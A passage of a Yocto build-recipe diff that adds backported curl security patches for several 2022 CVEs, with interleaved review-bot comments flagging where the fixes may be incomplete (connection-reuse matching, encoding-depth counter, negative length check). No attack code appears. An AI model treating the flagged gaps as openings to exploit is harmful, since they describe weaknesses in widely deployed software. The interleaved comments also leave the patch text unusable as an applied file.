235
236 /* Initialize TLS session as a client */
237@@ -879,7 +880,7 @@ gtls_connect_step1(struct connectdata *conn,
238
239 #ifdef USE_TLS_SRP
240 /* put the credentials to the current session */
241- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
242+ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) {
243 rc = gnutls_credentials_set(session, GNUTLS_CRD_SRP,
244 BACKEND->srp_client_cred);
245 if(rc != GNUTLS_E_SUCCESS) {
246@@ -1061,8 +1062,8 @@ gtls_connect_step3(struct connectdata *conn,
247 SSL_CONN_CONFIG(verifyhost) ||
248 SSL_CONN_CONFIG(issuercert)) {
249 #ifdef USE_TLS_SRP
250- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
251- && SSL_SET_OPTION(username) != NULL
252+ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
253+ && SSL_SET_OPTION(primary.username) != NULL
254 && !SSL_CONN_CONFIG(verifypeer)
255 && gnutls_cipher_get(session)) {
256 /* no peer cert, but auth is ok if we have SRP user and cipher and no
257@@ -1116,7 +1117,8 @@ gtls_connect_step3(struct connectdata *conn,
258 failf(data, "server certificate verification failed. CAfile: %s "
259 "CRLfile: %s", SSL_CONN_CONFIG(CAfile) ? SSL_CONN_CONFIG(CAfile):
260 "none",
261- SSL_SET_OPTION(CRLfile)?SSL_SET_OPTION(CRLfile):"none");
262+ SSL_SET_OPTION(primary.CRLfile) ?
263+ SSL_SET_OPTION(primary.CRLfile) : "none");
264 return CURLE_PEER_FAILED_VERIFICATION;
265 }
266 else
267@@ -1703,8 +1705,8 @@ static int Curl_gtls_shutdown(struct connectdata *conn, int sockindex)
268 gnutls_certificate_free_credentials(BACKEND->cred);
269
270 #ifdef USE_TLS_SRP
271- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
272- && SSL_SET_OPTION(username) != NULL)
273+ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
274+ && SSL_SET_OPTION(primary.username) != NULL)
275 gnutls_srp_free_client_credentials(BACKEND->srp_client_cred);
276 #endif
277
278diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
279index 19df847..62d2b00 100644
280--- a/lib/vtls/mbedtls.c
281+++ b/lib/vtls/mbedtls.c
282@@ -245,7 +245,7 @@ mbed_connect_step1(struct connectdata *conn,
283 const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
284 const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
285 char * const ssl_cert = SSL_SET_OPTION(cert);
286- const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
287+ const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
288 const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
289 conn->host.name;
290 const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
291diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
292index 86102f7..62fd7a2 100644
293--- a/lib/vtls/nss.c
294+++ b/lib/vtls/nss.c
295@@ -1955,13 +1955,13 @@ static CURLcode nss_setup_connect(struct connectdata *conn, int sockindex)
296 }
297 }
298
299- if(SSL_SET_OPTION(CRLfile)) {
300- const CURLcode rv = nss_load_crl(SSL_SET_OPTION(CRLfile));
301+ if(SSL_SET_OPTION(primary.CRLfile)) {
302+ const CURLcode rv = nss_load_crl(SSL_SET_OPTION(primary.CRLfile));
303 if(rv) {
304 result = rv;
305 goto error;
306 }
307- infof(data, " CRLfile: %s\n", SSL_SET_OPTION(CRLfile));
308+ infof(data, " CRLfile: %s\n", SSL_SET_OPTION(primary.CRLfile));
309 }
310
311 if(SSL_SET_OPTION(cert)) {
312diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
313index a14cecc..ec5a8f5 100644
314--- a/lib/vtls/openssl.c
315+++ b/lib/vtls/openssl.c
316@@ -2454,14 +2454,14 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
317 &data->set.proxy_ssl.certverifyresult : &data->set.ssl.certverifyresult;
318 const long int ssl_version = SSL_CONN_CONFIG(version);
319 #ifdef USE_TLS_SRP
320- const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(authtype);
321+ const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(primary.authtype);
322 #endif
323 char * const ssl_cert = SSL_SET_OPTION(cert);
324 const char * const ssl_cert_type = SSL_SET_OPTION(cert_type);
325 const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
326 const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
327 const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
328- const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
329+ const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
330 char error_buffer[256];
331
332 DEBUGASSERT(ssl_connect_1 == connssl->connecting_state);
333@@ -2741,15 +2741,15 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
334 #ifdef USE_TLS_SRP
335 if((ssl_authtype == CURL_TLSAUTH_SRP) &&
336 Curl_allow_auth_to_host(data)) {
337- char * const ssl_username = SSL_SET_OPTION(username);
338-
339+ char * const ssl_username = SSL_SET_OPTION(primary.username);
340+ char * const ssl_password = SSL_SET_OPTION(primary.password);
341 infof(data, "Using TLS-SRP username: %s\n", ssl_username);
342
343 if(!SSL_CTX_set_srp_username(BACKEND->ctx, ssl_username)) {
344 failf(data, "Unable to set SRP user name");
345 return CURLE_BAD_FUNCTION_ARGUMENT;
346 }
347- if(!SSL_CTX_set_srp_password(BACKEND->ctx, SSL_SET_OPTION(password))) {
348+ if(!SSL_CTX_set_srp_password(BACKEND->ctx, ssl_password)) {
349 failf(data, "failed setting SRP password");
350 return CURLE_BAD_FUNCTION_ARGUMENT;
351 }
352diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
353index e38f74e..e8cb70f 100644
354--- a/lib/vtls/vtls.c
355+++ b/lib/vtls/vtls.c
356@@ -89,6 +89,7 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
357 {
358 if((data->version == needle->version) &&
359 (data->version_max == needle->version_max) &&
360+ (data->ssl_options == needle->ssl_options) &&
361 (data->verifypeer == needle->verifypeer) &&
362 (data->verifyhost == needle->verifyhost) &&
363 (data->verifystatus == needle->verifystatus) &&
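Review bot: `Curl_ssl_config_matches()` gains only the `ssl_options` comparison, while the rest of the patch moves `CRLfile`, `username`, `password` and `authtype` into `struct ssl_primary_config`; the diffstat confirms a single added line in lib/vtls/vtls.c. Unless those four fields are compared in the part of the function outside the hunk (unlikely, since they are new to the struct), a connection set up with different SRP credentials or a different CRL file can still be selected for reuse, which is the case the subject line says is being closed. The comparison below is what the match would need; the clone and free helpers for `ssl_primary_config`, also outside the hunks, would have to handle the new string fields as well. The result should be diffed against the upstream commit named in `Upstream-Status`.

```c
  if((data->version == needle->version) &&
     /* … unchanged: version_max, ssl_options and verify* comparisons … */
     Curl_safecmp(data->CRLfile, needle->CRLfile) &&
#ifdef USE_TLS_SRP
     Curl_safecmp(data->username, needle->username) &&
     Curl_safecmp(data->password, needle->password) &&
     (data->authtype == needle->authtype) &&
#endif
     /* … unchanged: remaining string comparisons and return … */
```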
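--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch
@@ -0,0 +1,71 @@
+From 0a115a8903dffc7f723d1d4d71fb821d69eb8761 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 23:13:53 +0200
+Subject: [PATCH] url: check SSH config match on connection reuse
+
+CVE-2022-27782
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27782.html
+Closes #8825
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/1645e9b44505abd5cbaf65da5282c3f33b5924a5]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/url.c | 11 +++++++++++
+ lib/vssh/ssh.h | 6 +++---
+ 2 files changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 6518be9..8da0245 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1027,6 +1027,12 @@ static void prune_dead_connections(struct Curl_easy *data)
+ }
+ }
+
++static bool ssh_config_matches(struct connectdata *one,
++ struct connectdata *two)
++{
++ return (Curl_safecmp(one->proto.sshc.rsa, two->proto.sshc.rsa) &&
++ Curl_safecmp(one->proto.sshc.rsa_pub, two->proto.sshc.rsa_pub));
++}
+ /*
+ * Given one filled in connection struct (named needle), this function should
+ * detect if there already is one that has all the significant details
+@@ -1260,6 +1266,11 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
++ if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
++ if(!ssh_config_matches(needle, check))
++ continue;
++ }
++
+ if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
+ needle->bits.tunnel_proxy) {
+ /* The requested connection does not use a HTTP proxy or it uses SSL or
+diff --git a/lib/vssh/ssh.h b/lib/vssh/ssh.h
+index 0d4ee52..8f2632e 100644
+--- a/lib/vssh/ssh.h
++++ b/lib/vssh/ssh.h
+@@ -7,7 +7,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -120,8 +120,8 @@ struct ssh_conn {
+
+ /* common */
+ const char *passphrase; /* pass-phrase to use */
+- char *rsa_pub; /* path name */
+- char *rsa; /* path name */
++ char *rsa_pub; /* strdup'ed public key file */
++ char *rsa; /* strdup'ed private key file */
+ bool authed; /* the connection has been authenticated fine */
+ sshstate state; /* always use ssh.c:state() to change state! */
+ sshstate nextstate; /* the state to goto after stopping */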
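Review bot: `ssh_config_matches()` is called when `needle`'s handler is in the SSH family, but it also reads `proto.sshc` from `check`, and nothing in this hunk shows that `check` has already been confirmed to be an SSH connection. If an earlier test in `ConnectionExists()` (outside the hunk) guarantees both use the same protocol, a short comment at the call would make that dependency explicit, e.g. `/* check is known to use the same protocol as needle here */`. The helper also has no header comment; something like `/* ssh_config_matches() tells if two connections use the same SSH private and public key file names */` would make clear that it compares the configured file names, not key contents.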
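--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32206.patch
@@ -0,0 +1,52 @@
+From 25e7be39be5f8ed696b6085ced9cf6c17e6128f4 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 16 May 2022 16:28:13 +0200
+Subject: [PATCH] content_encoding: return error on too many compression steps
+
+The max allowed steps is arbitrarily set to 5.
+
+Bug: https://curl.se/docs/CVE-2022-32206.html
+CVE-2022-32206
+Reported-by: Harry Sintonen
+Closes #9049
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/3a09fbb7f264c67c43]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/content_encoding.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/lib/content_encoding.c b/lib/content_encoding.c
+index 6d47537..91e621f 100644
+--- a/lib/content_encoding.c
++++ b/lib/content_encoding.c
+@@ -934,6 +934,9 @@ static const content_encoding *find_encoding(const char *name, size_t len)
+ return NULL;
+ }
+
++/* allow no more than 5 "chained" compression steps */
++#define MAX_ENCODE_STACK 5
++
+ /* Set-up the unencoding stack from the Content-Encoding header value.
+ * See RFC 7231 section 3.1.2.2. */
+ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+@@ -941,6 +944,7 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ {
+ struct Curl_easy *data = conn->data;
+ struct SingleRequest *k = &data->req;
++ int counter = 0;
+
+ do {
+ const char *name;
+@@ -975,6 +979,11 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ if(!encoding)
+ encoding = &error_encoding; /* Defer error at stack use. */
+
++ if(++counter >= MAX_ENCODE_STACK) {
++ failf(data, "Reject response due to %u content encodings",
++ counter);
++ return CURLE_BAD_CONTENT_ENCODING;
++ }
+ /* Stack the unencoding stage. */
+ writer = new_unencoding_writer(conn, encoding, k->writer_stack);
+ if(!writer)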
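Review bot: The limit added to `Curl_build_unencoding_stack` is kept in a local, `int counter = 0;`, so it starts again on every call, and `++counter >= MAX_ENCODE_STACK` already rejects the fifth encoding although the comment above the macro says "allow no more than 5". Both points are only corrected by CVE-2023-23916.patch later in this series, which applies on top of this file's result (`index 91e621f`), so the patch header should record the dependency, for example `Note: incomplete without CVE-2023-23916.patch (per-request depth counter)`. `counter` is an `int` printed with `%u`; `%d` matches the type. The function body continues outside the hunks shown.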
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32207.patch b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
new file mode 100644
index 0000000000..f75aaecd64
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
@@ -0,0 +1,284 @@
1From af92181055d7d64dfc0bc9d5a13c8b98af3196be Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Wed, 25 May 2022 10:09:53 +0200
4Subject: [PATCH] fopen: add Curl_fopen() for better overwriting of files
5
6Bug: https://curl.se/docs/CVE-2022-32207.html
7CVE-2022-32207
8Reported-by: Harry Sintonen
9Closes #9050
10
11Upstream-Status: Backport [https://github.com/curl/curl/commit/20f9dd6bae50b]
12Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
13---
14 CMakeLists.txt | 1 +
15 configure.ac | 1 +
16 lib/Makefile.inc | 4 +-
17 lib/cookie.c | 19 ++-----
18 lib/curl_config.h.cmake | 3 ++
19 lib/fopen.c | 113 ++++++++++++++++++++++++++++++++++++++++
20 lib/fopen.h | 30 +++++++++++
21 7 files changed, 155 insertions(+), 16 deletions(-)
22 create mode 100644 lib/fopen.c
23 create mode 100644 lib/fopen.h
24
25diff --git a/CMakeLists.txt b/CMakeLists.txt
26index 73b053b..cc587b0 100644
27--- a/CMakeLists.txt
28+++ b/CMakeLists.txt
29@@ -869,6 +869,7 @@ elseif(HAVE_LIBSOCKET)
30 set(CMAKE_REQUIRED_LIBRARIES socket)
31 endif()
32
33+check_symbol_exists(fchmod "${CURL_INCLUDES}" HAVE_FCHMOD)
34 check_symbol_exists(basename "${CURL_INCLUDES}" HAVE_BASENAME)
35 check_symbol_exists(socket "${CURL_INCLUDES}" HAVE_SOCKET)
36 check_symbol_exists(select "${CURL_INCLUDES}" HAVE_SELECT)
37diff --git a/configure.ac b/configure.ac
38index d090622..7071077 100755
39--- a/configure.ac
40+++ b/configure.ac
41@@ -4059,6 +4059,7 @@ AC_CHECK_DECLS([getpwuid_r], [], [AC_DEFINE(HAVE_DECL_GETPWUID_R_MISSING, 1, "Se
42
43
44 AC_CHECK_FUNCS([fnmatch \
45+ fchmod \
46 geteuid \
47 getpass_r \
48 getppid \
49diff --git a/lib/Makefile.inc b/lib/Makefile.inc
50index 46ded90..79307d8 100644
51--- a/lib/Makefile.inc
52+++ b/lib/Makefile.inc
53@@ -63,7 +63,7 @@ LIB_CFILES = file.c timeval.c base64.c hostip.c progress.c formdata.c \
54 curl_multibyte.c hostcheck.c conncache.c dotdot.c \
55 x509asn1.c http2.c smb.c curl_endian.c curl_des.c system_win32.c \
56 mime.c sha256.c setopt.c curl_path.c curl_ctype.c curl_range.c psl.c \
57- doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c
58+ doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c fopen.c
59
60 LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
61 formdata.h cookie.h http.h sendf.h ftp.h url.h dict.h if2ip.h \
62@@ -84,7 +84,7 @@ LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
63 x509asn1.h http2.h sigpipe.h smb.h curl_endian.h curl_des.h \
64 curl_printf.h system_win32.h rand.h mime.h curl_sha256.h setopt.h \
65 curl_path.h curl_ctype.h curl_range.h psl.h doh.h urlapi-int.h \
66- curl_get_line.h altsvc.h quic.h socketpair.h rename.h
67+ curl_get_line.h altsvc.h quic.h socketpair.h rename.h fopen.h
68
69 LIB_RCFILES = libcurl.rc
70
71diff --git a/lib/cookie.c b/lib/cookie.c
72index 68054e1..a9ad20a 100644
73--- a/lib/cookie.c
74+++ b/lib/cookie.c
75@@ -97,8 +97,8 @@ Example set of cookies:
76 #include "curl_memrchr.h"
77 #include "inet_pton.h"
78 #include "parsedate.h"
79-#include "rand.h"
80 #include "rename.h"
81+#include "fopen.h"
82
83 /* The last 3 #include files should be in this order */
84 #include "curl_printf.h"
85@@ -1524,18 +1524,9 @@ static int cookie_output(struct Curl_easy *data,
86 use_stdout = TRUE;
87 }
88 else {
89- unsigned char randsuffix[9];
90-
91- if(Curl_rand_hex(data, randsuffix, sizeof(randsuffix)))
92- return 2;
93-
94- tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
95- if(!tempstore)
96- return 1;
97-
98- out = fopen(tempstore, FOPEN_WRITETEXT);
99- if(!out)
100- goto error;
101+ error = Curl_fopen(data, filename, &out, &tempstore);
102+ if(error)
103+ goto error;
104 }
105
106 fputs("# Netscape HTTP Cookie File\n"
107@@ -1581,7 +1572,7 @@ static int cookie_output(struct Curl_easy *data,
108 if(!use_stdout) {
109 fclose(out);
110 out = NULL;
111- if(Curl_rename(tempstore, filename)) {
112+ if(tempstore && Curl_rename(tempstore, filename)) {
113 unlink(tempstore);
114 goto error;
115 }
116diff --git a/lib/curl_config.h.cmake b/lib/curl_config.h.cmake
117index 98cdf51..fe43751 100644
118--- a/lib/curl_config.h.cmake
119+++ b/lib/curl_config.h.cmake
120@@ -124,6 +124,9 @@
121 /* Define to 1 if you have the <assert.h> header file. */
122 #cmakedefine HAVE_ASSERT_H 1
123
124+/* Define to 1 if you have the `fchmod' function. */
125+#cmakedefine HAVE_FCHMOD 1
126+
127 /* Define to 1 if you have the `basename' function. */
128 #cmakedefine HAVE_BASENAME 1
129
130diff --git a/lib/fopen.c b/lib/fopen.c
131new file mode 100644
132index 0000000..ad3691b
133--- /dev/null
134+++ b/lib/fopen.c
135@@ -0,0 +1,113 @@
136+/***************************************************************************
137+ * _ _ ____ _
138+ * Project ___| | | | _ \| |
139+ * / __| | | | |_) | |
140+ * | (__| |_| | _ <| |___
141+ * \___|\___/|_| \_\_____|
142+ *
143+ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
144+ *
145+ * This software is licensed as described in the file COPYING, which
146+ * you should have received as part of this distribution. The terms
147+ * are also available at https://curl.se/docs/copyright.html.
148+ *
149+ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
150+ * copies of the Software, and permit persons to whom the Software is
151+ * furnished to do so, under the terms of the COPYING file.
152+ *
153+ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
154+ * KIND, either express or implied.
155+ *
156+ * SPDX-License-Identifier: curl
157+ *
158+ ***************************************************************************/
159+
160+#include "curl_setup.h"
161+
162+#if !defined(CURL_DISABLE_COOKIES) || !defined(CURL_DISABLE_ALTSVC) || \
163+ !defined(CURL_DISABLE_HSTS)
164+
165+#ifdef HAVE_FCNTL_H
166+#include <fcntl.h>
167+#endif
168+
169+#include "urldata.h"
170+#include "rand.h"
171+#include "fopen.h"
172+/* The last 3 #include files should be in this order */
173+#include "curl_printf.h"
174+#include "curl_memory.h"
175+#include "memdebug.h"
176+
177+/*
178+ * Curl_fopen() opens a file for writing with a temp name, to be renamed
179+ * to the final name when completed. If there is an existing file using this
180+ * name at the time of the open, this function will clone the mode from that
181+ * file. if 'tempname' is non-NULL, it needs a rename after the file is
182+ * written.
183+ */
184+CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
185+ FILE **fh, char **tempname)
186+{
187+ CURLcode result = CURLE_WRITE_ERROR;
188+ unsigned char randsuffix[9];
189+ char *tempstore = NULL;
190+ struct_stat sb;
191+ int fd = -1;
192+ *tempname = NULL;
193+
194+ if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
195+ /* a non-regular file, fallback to direct fopen() */
196+ *fh = fopen(filename, FOPEN_WRITETEXT);
197+ if(*fh)
198+ return CURLE_OK;
199+ goto fail;
200+ }
201+
202+ result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
203+ if(result)
204+ goto fail;
205+
206+ tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
207+ if(!tempstore) {
208+ result = CURLE_OUT_OF_MEMORY;
209+ goto fail;
210+ }
211+
212+ result = CURLE_WRITE_ERROR;
213+ fd = open(tempstore, O_WRONLY | O_CREAT | O_EXCL, 0600);
214+ if(fd == -1)
215+ goto fail;
216+
217+#ifdef HAVE_FCHMOD
218+ {
219+ struct_stat nsb;
220+ if((fstat(fd, &nsb) != -1) &&
221+ (nsb.st_uid == sb.st_uid) && (nsb.st_gid == sb.st_gid)) {
222+ /* if the user and group are the same, clone the original mode */
223+ if(fchmod(fd, sb.st_mode) == -1)
224+ goto fail;
225+ }
226+ }
227+#endif
228+
229+ *fh = fdopen(fd, FOPEN_WRITETEXT);
230+ if(!*fh)
231+ goto fail;
232+
233+ *tempname = tempstore;
234+ return CURLE_OK;
235+
236+fail:
237+ if(fd != -1) {
238+ close(fd);
239+ unlink(tempstore);
240+ }
241+
242+ free(tempstore);
243+
244+ *tempname = NULL;
245+ return result;
246+}
247+
248+#endif /* ! disabled */
249diff --git a/lib/fopen.h b/lib/fopen.h
250new file mode 100644
251index 0000000..289e55f
252--- /dev/null
253+++ b/lib/fopen.h
254@@ -0,0 +1,30 @@
255+#ifndef HEADER_CURL_FOPEN_H
256+#define HEADER_CURL_FOPEN_H
257+/***************************************************************************
258+ * _ _ ____ _
259+ * Project ___| | | | _ \| |
260+ * / __| | | | |_) | |
261+ * | (__| |_| | _ <| |___
262+ * \___|\___/|_| \_\_____|
263+ *
264+ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
265+ *
266+ * This software is licensed as described in the file COPYING, which
267+ * you should have received as part of this distribution. The terms
268+ * are also available at https://curl.se/docs/copyright.html.
269+ *
270+ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
271+ * copies of the Software, and permit persons to whom the Software is
272+ * furnished to do so, under the terms of the COPYING file.
273+ *
274+ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
275+ * KIND, either express or implied.
276+ *
277+ * SPDX-License-Identifier: curl
278+ *
279+ ***************************************************************************/
280+
281+CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
282+ FILE **fh, char **tempname);
283+
284+#endif
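Review bot: In `Curl_fopen` the first branch, `if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode))`, is also taken when the target file does not exist yet, but its comment mentions only a non-regular file. In that case the file is created by plain `fopen(filename, FOPEN_WRITETEXT)`, so its permissions come from the process umask rather than from the `0600` used for the temp file, which is worth stating at the fallback. I would reword the comment to `/* no existing regular file (stat failed or not S_ISREG): direct fopen(), a new file gets its mode from the umask */`. `stat()` and the later rename in `cookie_output` both act on the path name rather than on an open descriptor, so the cloned mode is that of whatever the path referred to at `stat()` time.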
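--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32208.patch
@@ -0,0 +1,72 @@
+From 3b90f0b2a7a84645acce151c86b40d25b5de6615 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Jun 2022 09:27:24 +0200
+Subject: [PATCH] krb5: return error properly on decode errors
+
+Bug: https://curl.se/docs/CVE-2022-32208.html
+CVE-2022-32208
+Reported-by: Harry Sintonen
+Closes #9051
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/6ecdf5136b52af7]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/krb5.c | 5 +----
+ lib/security.c | 13 ++++++++++---
+ 2 files changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/lib/krb5.c b/lib/krb5.c
+index f50287a..5b77e35 100644
+--- a/lib/krb5.c
++++ b/lib/krb5.c
+@@ -86,11 +86,8 @@ krb5_decode(void *app_data, void *buf, int len,
+ enc.value = buf;
+ enc.length = len;
+ maj = gss_unwrap(&min, *context, &enc, &dec, NULL, NULL);
+- if(maj != GSS_S_COMPLETE) {
+- if(len >= 4)
+- strcpy(buf, "599 ");
++ if(maj != GSS_S_COMPLETE)
+ return -1;
+- }
+
+ memcpy(buf, dec.value, dec.length);
+ len = curlx_uztosi(dec.length);
+diff --git a/lib/security.c b/lib/security.c
+index fbfa707..3542210 100644
+--- a/lib/security.c
++++ b/lib/security.c
+@@ -192,6 +192,7 @@ static CURLcode read_data(struct connectdata *conn,
+ {
+ int len;
+ CURLcode result;
++ int nread;
+
+ result = socket_read(fd, &len, sizeof(len));
+ if(result)
+@@ -200,7 +201,10 @@ static CURLcode read_data(struct connectdata *conn,
+ if(len) {
+ /* only realloc if there was a length */
+ len = ntohl(len);
+- buf->data = Curl_saferealloc(buf->data, len);
++ if(len > CURL_MAX_INPUT_LENGTH)
++ len = 0;
++ else
++ buf->data = Curl_saferealloc(buf->data, len);
+ }
+ if(!len || !buf->data)
+ return CURLE_OUT_OF_MEMORY;
+@@ -208,8 +212,11 @@ static CURLcode read_data(struct connectdata *conn,
+ result = socket_read(fd, buf->data, len);
+ if(result)
+ return result;
+- buf->size = conn->mech->decode(conn->app_data, buf->data, len,
+- conn->data_prot, conn);
++ nread = buf->size = conn->mech->decode(conn->app_data, buf->data, len,
++ conn->data_prot, conn);
++ if(nread < 0)
++ return CURLE_RECV_ERROR;
++ buf->size = (size_t)nread;
+ buf->index = 0;
+ return CURLE_OK;
+ }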
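Review bot: In `read_data` the new line `nread = buf->size = conn->mech->decode(...)` stores the raw return value in `buf->size` before the sign is checked, so on a decode failure the function returns `CURLE_RECV_ERROR` while `buf->size` holds the converted -1. Assigning only to the signed local leaves the buffer state untouched on the error path: `nread = conn->mech->decode(conn->app_data, buf->data, len, conn->data_prot, conn);`, followed by the existing `if(nread < 0)` and `buf->size = (size_t)nread;`. Separately, `len` is an `int` taken from the wire through `ntohl()` and `if(len > CURL_MAX_INPUT_LENGTH)` has no lower bound, so a negative value presumably still reaches `Curl_saferealloc`; `if(len < 0 || len > CURL_MAX_INPUT_LENGTH)` would reject it explicitly. `read_data` starts outside the hunks.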
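--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32221.patch
@@ -0,0 +1,29 @@
+From 75c04a3e75e8e3025a17ca3033ca307da9691cd0 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Fri, 11 Nov 2022 10:49:58 +0530
+Subject: [PATCH] CVE-2022-32221
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/a64e3e59938abd7d6]
+CVE: CVE-2022-32221
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+setopt: when POST is set, reset the 'upload' field.
+---
+ lib/setopt.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/lib/setopt.c b/lib/setopt.c
+index bebb2e4..4d96f6b 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -486,6 +486,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ }
+ else
+ data->set.httpreq = HTTPREQ_GET;
++ data->set.upload = FALSE;
+ break;
+
+ case CURLOPT_COPYPOSTFIELDS:
+--
+2.25.1
+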
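--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35252.patch
@@ -0,0 +1,72 @@
+From c9212bdb21f0cc90a1a60dfdbb716deefe78fd40 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 29 Aug 2022 00:09:17 +0200
+Subject: [PATCH] cookie: reject cookies with "control bytes"
+
+Rejects 0x01 - 0x1f (except 0x09) plus 0x7f
+
+Reported-by: Axel Chong
+
+Bug: https://curl.se/docs/CVE-2022-35252.html
+
+CVE-2022-35252
+
+Closes #9381
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/8dfc93e573ca740544a2d79ebb]
+
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/cookie.c | 29 +++++++++++++++++++++++++++++
+ 1 file changed, 29 insertions(+)
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index a9ad20a..66c7715 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -412,6 +412,30 @@ static bool bad_domain(const char *domain)
+ return !strchr(domain, '.') && !strcasecompare(domain, "localhost");
+ }
+
++/*
++ RFC 6265 section 4.1.1 says a server should accept this range:
++
++ cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E
++
++ But Firefox and Chrome as of June 2022 accept space, comma and double-quotes
++ fine. The prime reason for filtering out control bytes is that some HTTP
++ servers return 400 for requests that contain such.
++*/
++static int invalid_octets(const char *p)
++{
++ /* Reject all bytes \x01 - \x1f (*except* \x09, TAB) + \x7f */
++ static const char badoctets[] = {
++ "\x01\x02\x03\x04\x05\x06\x07\x08\x0a"
++ "\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14"
++ "\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f"
++ };
++ size_t vlen, len;
++ /* scan for all the octets that are *not* in cookie-octet */
++ len = strcspn(p, badoctets);
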